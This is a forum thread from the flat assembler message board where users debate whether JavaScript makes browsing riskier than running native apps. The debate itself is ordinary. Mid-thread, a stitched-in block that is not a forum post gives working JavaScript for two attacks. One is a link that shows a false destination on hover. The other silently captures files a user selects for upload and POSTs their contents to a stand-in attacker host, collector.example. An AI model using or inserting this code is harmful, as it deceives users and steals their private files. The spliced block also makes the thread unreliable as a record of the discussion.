flat assembler
Message board for the users of flat assembler.

flat assembler > Heap > Why we should always disable JS (and flash)

revolution
When all else fails, read the source
Joined: 24 Aug 2004, Posts: 16737, Location: In your JS exploiting you and your system
If the only way to use a service is to be forced to expose yourself and your system to increased risk then that service should die IMO. Remote services have no right to require everyone to bend to their will. They should be grateful we give them our attention, not demanding that we comply with their desires.

It used to be that something as simple as a messenger program could be used to communicate with others over public protocols. But now that is all disappearing. The companies have taken over and closed all the protocols and force people to use only their code/app to access only their systems, with everything logged and recorded.
Post 07 Jun 2019, 16:35
DimonSoft
Joined: 03 Mar 2010, Posts: 571, Location: Belarus
revolution wrote:
The difference is still not mentioned. With a VM the user decides when new code is allowed to run by installing a new version. A version that comes from a trusted source, probably with SHA hashes, and a well known publisher. Probably on a schedule of not more than a few times per year, or maybe never updating.

Nothing different, except that “SHA hashes” are checked automatically by the browser. What prevents an attacker who is able to replace an application in a trusted source with a rogue version from also changing the piece of text of the webpage to show the new SHA hash for the rogue version? What is the purpose?

Quote:
(see the previous link I gave)

… where the problem is not caused by JavaScript. How does a piece of text written with a certain syntax differ from any other document?

Quote:
Someone with a native app in a VM only cares about a few apps total, from a few devs, doing limited and wanted functions. A firewall policy can catch a lot of bad behaviour, and the user can talk to the dev about any concerns.

So what? Access the websites with JS enabled with a browser in a VM. NO DIFFERENCE. Point.

Quote:
How do you filter at the firewall a browser that goes to so many different domains?

Only those the server allowed to send data to. If you use the service they already have your data and could have sent it to any domain they wish whenever they wish. JS can only send data to a small subset of servers that are specified as trusted by the server which is the source of the page.

Quote:
How would you limit it to actions only the user desires?

It is limited, unless you know nothing about its limitations. Those that sometimes cause web application developers to spend much time looking for alternative solutions to their tasks so they do not face the limitations of JS.
Post 07 Jun 2019, 21:37
revolution
Do you really think that an app that I deliberately download and want, and some random code a website delivers to me, are the same thing? Clearly I can't seem to explain the difference.

fasm is a great example of code that I find desirable, so I download it and use it. It doesn't need any network communication so it is blocked by default in the firewall since I never felt the need to explicitly enable it. And one day if I find the firewall log shows that fasm has been blocked from communicating then I will know something is very wrong. I can then talk to the developer, or delete it, or edit the code, or go back to an older version, or whatever I please.

If fasm was an online only assembler, then what? How can I know what it is doing? I can't block the browser at the firewall to stop data leakage since it would require the browser. It might be capturing my clipboard and sending sensitive data to unknown places. I wouldn't know and couldn't check. I wouldn't know which version I was running, I wouldn't even know if the JS I was given is the same as other people are getting. And where is all the code I write stored? In which country under which laws? Who gets to see it? Is it enabling the microphone or camera? Is it trying to exploit a rowhammer attack hoping I have an old unpatched OS? Is it mining for bitcoins in the background? What about when I'm in a place with no Internet, then I can't use it. Is the server secure, or under attack and delivering rogue code to people?

I'm not sure that can be considered the same thing. Those are very different situations.
Post 07 Jun 2019, 22:07
DimonSoft
revolution wrote:
fasm is a great example of code that that I find desirable, so I download it and use it. It doesn't need any network communication so it is blocked by default in the firewall since I never felt the need to explicitly enable it. And one day if I find the firewall log shows that fasm has been blocked from communicating then I will know something is very wrong. I can then talk to the developer, or delete it, or edit the code, or go back to an older version, or whatever I please.

If fasm was an online only assembler, then what? How can I know what it is doing? I can't block the browser at the firewall to stop data leakage since it would require the browser.

So, the problem is when an application requires internet connection.

revolution wrote:
It might be capturing my clipboard and sending sensitive data to unknown places.

If ANY application requires internet connection it can do so. Not a JS problem.

Quote:
I wouldn't know and couldn't check.

You could but it would have required sniffing packets and stuff. Just like with any other network-related application. Not a JS problem.

Quote:
I wouldn't know which version I was running, I wouldn't even know if the JS I was given is the same as other people are getting.

It’s not the version that matters; what the particular implementation that you get does is what matters. People download fasm of different versions and the one you use might not be the same as mine due to the difference in the time we’ve downloaded them.

Quote:
And where is all the code I write stored? In which country under which laws? Who gets to see it?

Nothing changes when the application uses plain HTTP without a single JS line. Not a JS problem.

Quote:
Is it enabling the microphone or camera?

Unlike desktop applications, web browsers do show a notification of web camera and/or microphone usage. With desktop applications you can only rely on a LED being present near your camera and usually have no luck detecting microphone usage without explicitly opening the microphone parameters or something like that. Not a JS problem.

Quote:
Is it trying to exploit a rowhammer attack hoping I have an old unpatched OS?

You can’t be sure for any application except maybe your own ones. But then again Thompson’s hack. Doing so from JS is much harder. Not a JS problem.

Quote:
Is it mining for bitcoins in the background?

You can guess from the CPU usage. The same for any other type of applications. Miners are also more efficient when run as native applications (and they tend to be implemented as such), not as JS scripts. Not a JS problem.

revolution wrote:
What about when I'm in a place with no Internet, then I can't use it.

What if I use a sound recorder and have no microphone? JS itself works without network connection. Two unrelated requirements. Not a JS problem.

Quote:
Is the server secure, or under attack and delivering rogue code to people?

How do you tell it from downloading applications and checking hashes? An attacker that has control over the server can not only replace the file but also replace the hash info. Not a JS problem.

I can’t believe I had to write that again.
Post 08 Jun 2019, 06:10
revolution
So you would suggest that the fasm code has the same probability of causing us harm as some random website delivering JS? I can't believe the risks are the same, or even close to the same. Indeed the risks are vastly different, and perhaps that is the important thing that you seem to have missed.

Walking a tightrope isn't a problem. You could still easily die in your home by accidentally slipping. So we might as well walk the high-wires everywhere. Both can kill us, so they are the same thing.
Post 08 Jun 2019, 06:18
Furs
Joined: 04 Mar 2016, Posts: 1429
DimonSoft wrote:
So, the problem is when an application requires internet connection.
Exactly this.

The real problem is that revolution compares Javascript web apps with offline apps, but by definition those are online. His issues apply to any app with an internet connection...
Post 08 Jun 2019, 11:58
guignol
Joined: 06 Dec 2008, Posts: 605, Location: /96A
I can't believe that either
any scripting language has to be robust
Post 08 Jun 2019, 12:23
sleepsleep
Joined: 05 Oct 2006, Posts: 8364, Location: ˛ Posts: 334455
I can firewall Chrome, but doing so would render Chrome chromeless,

there is no difference between data and code, it solely depends on who is going to parse them,

maybe this is a browser problem, we need a browser with a custom JS DLL that disables eval and friends, why not let us customize JS,
Post 08 Jun 2019, 14:43
revolution
Furs wrote:
DimonSoft wrote:
So, the problem is when an application requires internet connection.
Exactly this.

The real problem is that revolution compares Javascript web apps with offline apps, but by definition those are online. His issues apply to any app with an internet connection...
His or her.

Certainly access to the Internet is a major part of the problem. And that is why JS is dangerous because you are expected to allow it access to the Internet so that it can download more JS code to do more things you aren't aware of.

And I think some people here perhaps still haven't understood the difference from some app that can be constrained locally. If it needs an Internet connection because of the nature of the app (it might be a communication program), then we can monitor its activities through the firewall. But if it is running in a browser that doesn't work anymore, since everything is running under one process and gets mixed together, so its activities are obscured by other tabs and browser processes doing other things.

Do you know how many IP addresses you accessed today that ran embedded JS code? Probably many hundreds, or thousands, for the average user. Do you know how many of those were running "good" code? Do you know what they were all doing, or why they were doing it? Why do those sites have so much code running? Is it really all just to make fancy animated menus?
Post 08 Jun 2019, 16:31
DimonSoft
revolution wrote:
So you would suggest that the fasm code has the same probability to cause us harm and some random website delivering JS? I can't believe the risks are the same, or even close to the same. Indeed the risks are vastly different, and perhaps the is the important thing that you seem to have missed.

Not different at all if you compare a web-application (that requires internet access by definition) with a desktop application that requires internet access. If you compare a needle and an elephant then you can prove any of them is more dangerous.

revolution wrote:
Walking a tightrope isn't a problem. You could still easily die in your home by accidentally slipping. So we might as well walk the high-wires everywhere. Both can kill us, so they are the same thing.

A good reason to create a topic called “Why we should prohibit selling ropes” and to post messages about children choking on threads.

revolution wrote:
Certainly access to the Internet is a major part of the problem. And that is why JS is dangerous because you are expected to allow it access to the Internet so that it can download more JS code to do more things you aren't aware of.

“JS is dangerous because you’re expected to allow a web browser to access the Internet”. Cool! How does this differ from desktop applications that require Internet access but do not need JS? Not a JS problem.

revolution wrote:
And I think some people here perhaps still haven't understood the difference to some app that can be constrained locally. If it needs an Internet connection because of the nature of the app (it might be a communication program), then we can monitor its activities through the firewall. But if it is running in a browser that doesn't work anymore since everything is running under one process and gets mixed together, so its activities are obscured by other tabs and browser processes doing other things.

So, there’s no traffic monitor in your web browser, that’s the reason. I see. Just curious: is it IE4 or Arachne?

revolution wrote:
Do you know how many IP addresses you accessed today that ran embedded JS code?

No, and I don’t care since I know that it is well constrained by the rules imposed by the browser and, if the website owner having my data plays fair, nothing dangerous will happen.

revolution wrote:
Probably many hundreds, or thousands, for the average user. Do you know how many of those were running "good" code?

Doesn’t matter, since the code is limited to its own browser tab.

revolution wrote:
Do you know what they were all doing, or why they were doing it?

What about your desktop applications? Have you looked through every IP packet that crossed the boundary between your computer and the Internet? What about your phone?

revolution wrote:
Why do those sites have so much code running? Is it really all just to make fancy animated menus?

Open the Inspector and check it if you wish. Just like you open every application you’re going to run in a debugger.
Post 08 Jun 2019, 19:09
revolution
How would you suggest that we protect ourselves from rogue websites, and bad webhosts?
Post 08 Jun 2019, 20:36
DimonSoft
revolution wrote:
How would you suggest that we protect ourselves from rogue websites, and bad webhosts?

Shutting down routers?
Post 09 Jun 2019, 20:45
sts-q
Joined: 29 Nov 2018, Posts: 24
Hello! :)

I just uploaded via Firefox a file out of my private filesystem to some cloud server. I had to enter a password for this cloud thing.

Can you link me to a discussion where it is explained why other programs running inside my browser cannot read files while this one could?

I have no idea how this is guaranteed, far less how safe that may be.

greeting
sts-q
Post 18 Jun 2019, 04:06
revolution
sts-q: Are you asking about the file selection box for uploading? Like with the "Add Attachment" button in the reply edit window for this board?

There is an HTML tag that allows the browser to send a file during a POST request. There is no requirement for JS to activate this, it is native HTML. But JS can intercept this tag and get access to files to process them.

As for any passwords, that would be for the cloud service side, not for your own machine.

For this board we have:
Code:
<input name="fileupload" style="width:320px" maxlength="2097152" value="" class="bginput" type="file">    
Post 18 Jun 2019, 07:44
sts-q
revolution: I sometimes accidentally click on a button and that way download something I did not want. Sourceforge is good at that. That way it's simple to get access to this functionality: give me a picture that looks like what I am looking for.

Now, the trick is to know about my source tree and file names to download -- in this case upload -- any readable file from my home PC to some advertisement provider coming from anywhere on this blue planet?

Right??? Or did I get it wrong???
Post 18 Jun 2019, 08:15
revolution
sts-q: I'm not sure about your question.

Are you asking if JS can upload a file from your computer without your knowledge? Are you asking if JS can download a file to your computer without your knowledge?

In theory both of those should not be possible without exploiting some bug somewhere.

But for both, you also have the complication that JS can show you false information in the status bar about where the link goes. Thus fooling you into clicking the wrong place. And JS can intercept files you want to upload and send them to other places you didn't explicitly allow. You would have to trust the website to be honest and not hacked to not be caught by both of those cases where JS takes over from the browser's inbuilt actions.
Post 18 Jun 2019, 08:34
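The two takeovers of built-in browser actions described in the post above (a link whose hover target is not where it goes, and a page script that reads the files a user picked for one form and sends copies elsewhere), together with the file-input tag shown a few posts earlier, look like this in page JavaScript. This is an added example, not code from the thread: the host names download.example and collector.example and the file notes.txt are constructed, and the FakeAnchor/FakeFileInput classes are stand-ins so the same functions can be exercised under Node as well as in a browser.

```javascript
'use strict';

// 1. Status-bar spoof. Browsers show anchor.href on hover. mousedown fires
//    before the click that navigates, so swapping href there means the user
//    sees one target and lands on another; mouseleave restores the decoy.
function makeDeceptiveLink(anchor, shownHref, realHref) {
  anchor.href = shownHref;
  anchor.addEventListener('mousedown', () => { anchor.href = realHref; });
  anchor.addEventListener('mouseleave', () => { anchor.href = shownHref; });
  return anchor;
}

// 2. Upload interception. The page cannot open the picker or choose a path
//    for the user, but once the user has selected files the File API hands the
//    script their names and bytes, and a no-cors POST can carry them to any
//    origin (the script just cannot read the reply). Nothing here exploits a
//    bug; it is ordinary page JavaScript.
function interceptUploads(input, exfilUrl, send = postNoCors) {
  const captured = [];                    // file names seen so far (filled synchronously)
  input.addEventListener('change', () => {
    for (const file of input.files) {
      captured.push(file.name);
      file.text().then((contents) => send(exfilUrl, file.name, contents));
    }
  });
  return captured;
}

// A simple cross-origin POST: sent without preflight, response opaque to the page.
function postNoCors(url, name, contents) {
  return fetch(url, { method: 'POST', mode: 'no-cors', body: `${name}\n${contents}` });
}

// Stand-ins so the example also runs outside a browser (Node 15+ has EventTarget).
class FakeAnchor extends EventTarget {
  constructor() { super(); this.href = ''; }
}
class FakeFileInput extends EventTarget {
  constructor(files) { super(); this.files = files; }
}

// Walk through both behaviours with constructed objects and return what the
// user saw versus what actually happened. In a real page the same calls are
// makeDeceptiveLink(document.querySelector('a#offer'), ...) and
// interceptUploads(document.querySelector('input[type=file]'), ...).
function demo() {
  const link = makeDeceptiveLink(
    new FakeAnchor(),
    'https://download.example/fasm.zip',     // what the status bar shows (constructed)
    'https://collector.example/landing',     // where the click really goes (hypothetical)
  );
  const hovered = link.href;
  link.dispatchEvent(new Event('mousedown'));
  const clicked = link.href;

  const sent = [];                           // what the exfil endpoint would receive
  const picker = new FakeFileInput([
    { name: 'notes.txt', text: async () => 'constructed file body' },   // duck-typed File
  ]);
  const captured = interceptUploads(
    picker,
    'https://collector.example/drop',        // hypothetical attacker endpoint
    (url, name, contents) => { sent.push({ url, name, contents }); },
  );
  picker.dispatchEvent(new Event('change'));
  return { hovered, clicked, captured, sent };
}

module.exports = { makeDeceptiveLink, interceptUploads, FakeAnchor, FakeFileInput, demo };
```

What a practitioner can check: with scripts enabled, the status bar and "copy link address" only show the anchor's current href, so the network panel (or viewing the page with JS disabled) is the reliable way to see the real target; for uploads, a second request to an unrelated origin right after selecting a file is the tell. Neither behaviour needs a browser bug, which also bears on the question of whether a script can pre-fill the file path: it cannot, but what happens to the bytes after the user has picked the file is up to the page.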
sts-q
revolution wrote:

Are you asking if JS can upload a file from your computer without your knowledge? Are you asking if JS can download a file to your computer without your knowledge?


Can JS upload a file, providing a default path into my filesystem, so that I just need to click "Accept"?

I **believe** and **hope** the default Firefox comes up with is remembered and done by Firefox.

I realize that I am pretty naive and ignorant about all this.


Post 18 Jun 2019, 11:12
revolution
sts-q wrote:
Can JS upload a file, providing a default path into my filesystem, so that i just and only need to click "Accept"?
This shouldn't be possible. The browser requires you to select a file (usually with a "browse ..." button) and you will see the file selection dialog.
Post 18 Jun 2019, 11:46
guignol
and how to add a smile on this board?
Post 18 Jun 2019, 16:38
sts-q
click "Review" right bottom -- and smile
Post 18 Jun 2019, 17:30
Copyright © 1999-2019, Tomasz Grysztar.

Powered by rwasa.